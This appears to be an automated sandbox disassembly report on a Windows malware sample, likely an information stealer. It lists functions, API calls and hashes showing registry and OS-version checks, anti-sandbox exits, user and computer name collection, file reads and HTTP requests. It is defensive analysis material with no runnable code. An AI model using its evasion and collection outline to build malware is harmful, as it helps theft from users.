Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
Instruction ID: b36890d62cb3ca893cd31c8d348e0eb5c9077a4e060c1bca12aaf12a224d4413
Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
Instruction Fuzzy Hash: DE215BB5D00219ABDF10DFA4E848AED7B75FF04320F008225F925A7290EB706A05CF91

Function 022B78F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B790B
RtlAllocateHeap.NTDLL(00000000), ref: 022B7912
RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022B7944
RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022B7965
RegCloseKey.ADVAPI32(00000000), ref: 022B796F

Strings

Windows 11, xrefs: 022B7924

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction ID: 8957998eaf940a0994f3994341616412949f9b87a913ee7a6ae0602f8506b236
Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction Fuzzy Hash: 91012CB9A80205BBEB11DBE0DD49FADB7B9EB49701F005154FA05A6284D7749900CB51

Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
HeapAlloc.KERNEL32(00000000), ref: 004176AB
RegOpenKeyExA.ADVAPI32(80000002,00749D30,00000000,00020119,00000000), ref: 004176DD
RegQueryValueExA.ADVAPI32(00000000,007813F0,00000000,00000000,?,000000FF), ref: 004176FE
RegCloseKey.ADVAPI32(00000000), ref: 00417708

Strings

Windows 11, xrefs: 004176BD

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55

Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
HeapAlloc.KERNEL32(00000000), ref: 0041773B
RegOpenKeyExA.ADVAPI32(80000002,00749D30,00000000,00020119,004176B9), ref: 0041775B
RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
RegCloseKey.ADVAPI32(004176B9), ref: 00417784

Strings

CurrentBuildNumber, xrefs: 00417771

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51

Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
CloseHandle.KERNEL32(000000FF), ref: 00419327

Strings

:A, xrefs: 00419311, 0041933D, 00419314
:A, xrefs: 004192F8, 004192FB

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :A$:A
API String ID: 1378416451-1974578005
Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45

Function 022A7537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022A75A1
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022A7618
StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022A7674
GetProcessHeap.KERNEL32(00000000,?), ref: 022A76B9
HeapFree.KERNEL32(00000000), ref: 022A76C0

Part of subcall function 022A94A7: vsprintf_s.MSVCRT ref: 022A94C2

task.LIBCPMTD ref: 022A77BC

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
String ID:
API String ID: 700816787-0
Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
Instruction ID: 4f2128828bc7d5ba6241ebd1353d8f4716132f16d99e55c4dcd4da5e2d2e4d9a
Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
Instruction Fuzzy Hash: B8612BB591026C9BDB24DB90CC54FEDB7B9BF48300F0081E9E649A6544DBB0ABC9CF95

Function 022B5527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022A64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022A6548
Part of subcall function 022A64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022A656A
Part of subcall function 022A64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A659C
Part of subcall function 022A64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A65EC
Part of subcall function 022A64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022A6626
Part of subcall function 022A64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022A6638

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022B557F
lstrlen.KERNEL32(00000000), ref: 022B5596

Part of subcall function 022B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022B90B9

StrStrA.SHLWAPI(00000000,00000000), ref: 022B55CB
lstrlen.KERNEL32(00000000), ref: 022B55EA
strtok.MSVCRT(00000000,?), ref: 022B5605
lstrlen.KERNEL32(00000000), ref: 022B5615

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID:
API String ID: 3532888709-0
Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
Instruction ID: ec6761d1c74963cfe6958cb7f454c2ea5f884cfe9f996101c57192c4c9936689
Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
Instruction Fuzzy Hash: E151FC70520348DBCB29FFE8CE95AED7776AF15380F904018E50A6A598DF346B45CF61

Function 022B7337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022B7345

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

OpenProcess.KERNEL32(001FFFFF,00000000,022B7574,004205BD), ref: 022B7383
memset.MSVCRT ref: 022B73D1
??_V@YAXPAX@Z.MSVCRT(?), ref: 022B7525

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID:
API String ID: 224852652-0
Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
Instruction ID: 021af19b94f143a2ef5385e73da057f3a5f3000df7007178e632185d79251897
Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
Instruction Fuzzy Hash: 6B51A2B1C203199FDB25DBE4DC84BEDF7B5AF84345F1080A8E605A7184DB746A84CF68

Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413588

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

strtok_s.MSVCRT ref: 004136D1

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: fe3b87b6f6acf7afd5d4449a718a807af28f1f679ba49a272679b0303449510e
Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
Opcode Fuzzy Hash: fe3b87b6f6acf7afd5d4449a718a807af28f1f679ba49a272679b0303449510e
Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA

Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B39A

Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6

DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7

Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37

DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE

Function 022B6C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022B9B08
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022B9B21
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022B9B39
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022B9B51
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022B9B6A
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022B9B82
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,ct), ref: 022B9B9A
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022B9BB3
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022B9BCB
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022B9BE3
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022B9BFC
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022B9C14
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,@et), ref: 022B9C2C
Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0, u), ref: 022B9C45

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022A1437: ExitProcess.KERNEL32 ref: 022A1478

Part of subcall function 022A13C7: GetSystemInfo.KERNEL32(?), ref: 022A13D1
Part of subcall function 022A13C7: ExitProcess.KERNEL32 ref: 022A13E5

Part of subcall function 022A1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022A1392
Part of subcall function 022A1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022A1399
Part of subcall function 022A1377: ExitProcess.KERNEL32 ref: 022A13AA

Part of subcall function 022A1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022A14A5
Part of subcall function 022A1487: __aulldiv.LIBCMT ref: 022A14BF
Part of subcall function 022A1487: __aulldiv.LIBCMT ref: 022A14CD
Part of subcall function 022A1487: ExitProcess.KERNEL32 ref: 022A14FB

Part of subcall function 022B69D7: GetUserDefaultLangID.KERNEL32 ref: 022B69DB

Part of subcall function 022A13F7: ExitProcess.KERNEL32 ref: 022A142D

Part of subcall function 022B7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022A141E), ref: 022B7AE7
Part of subcall function 022B7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022B7AEE
Part of subcall function 022B7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022B7B06

Part of subcall function 022B7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B7B77
Part of subcall function 022B7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022B7B7E
Part of subcall function 022B7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022B7B96

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D31
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022B6D4F
CloseHandle.KERNEL32(00000000), ref: 022B6D60
Sleep.KERNEL32(00001770), ref: 022B6D6B
CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D81
ExitProcess.KERNEL32 ref: 022B6D89

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
Instruction ID: 5c683ca62fb3632ffc8ac7c21d7c5f8a8545e674c0c9868e4d555147abc7ae4d
Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
Instruction Fuzzy Hash: 8A318931A20309ABCB06FBF0DC14FFD737AAF15380F500518E202A6198EF746A44CE61

Function 022A9C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
CloseHandle.KERNEL32(000000FF), ref: 022A9D01

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
Instruction ID: a736335ed3acf53bbc305b40577f669881a3c8e9f009f8df9d197cb8c76dab29
Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
Instruction Fuzzy Hash: F03105B8A10209EFDB14CFD5C894BEE77F6EF49304F108158E911A7294C778AA81CFA1

Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
LocalFree.KERNEL32(004102E7), ref: 00409A90
CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 2b4f8e405d2369f2863bb245f51e009722d8db0482d6a35c31e42cb89a7514ce
Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
Opcode Fuzzy Hash: 2b4f8e405d2369f2863bb245f51e009722d8db0482d6a35c31e42cb89a7514ce
Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5

Function 022BCC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 022BCC51

Part of subcall function 022BC206: __getptd_noexit.LIBCMT ref: 022BC209
Part of subcall function 022BC206: __amsg_exit.LIBCMT ref: 022BC216

__amsg_exit.LIBCMT ref: 022BCC71
__lock.LIBCMT ref: 022BCC81
InterlockedDecrement.KERNEL32(?), ref: 022BCC9E
free.MSVCRT ref: 022BCCB1
InterlockedIncrement.KERNEL32(0042B980), ref: 022BCCC9

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
Instruction ID: 19411c95162152489aefe0eca17a0dbd62482d4ed8816632cf73913853da1777
Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
Instruction Fuzzy Hash: 82010032E20B26AFC723ABE494447DD7360FF24796F140127EC10A72A8CB646481DFD9

Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C9EA

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__amsg_exit.LIBCMT ref: 0041CA0A
__lock.LIBCMT ref: 0041CA1A
InterlockedDecrement.KERNEL32(?), ref: 0041CA37
free.MSVCRT ref: 0041CA4A
InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD

Function 022B7167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 022B7186
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022B7401,00000000,00420BA8,00000000,00000000), ref: 022B71B4

Part of subcall function 022B6E37: strlen.MSVCRT ref: 022B6E48
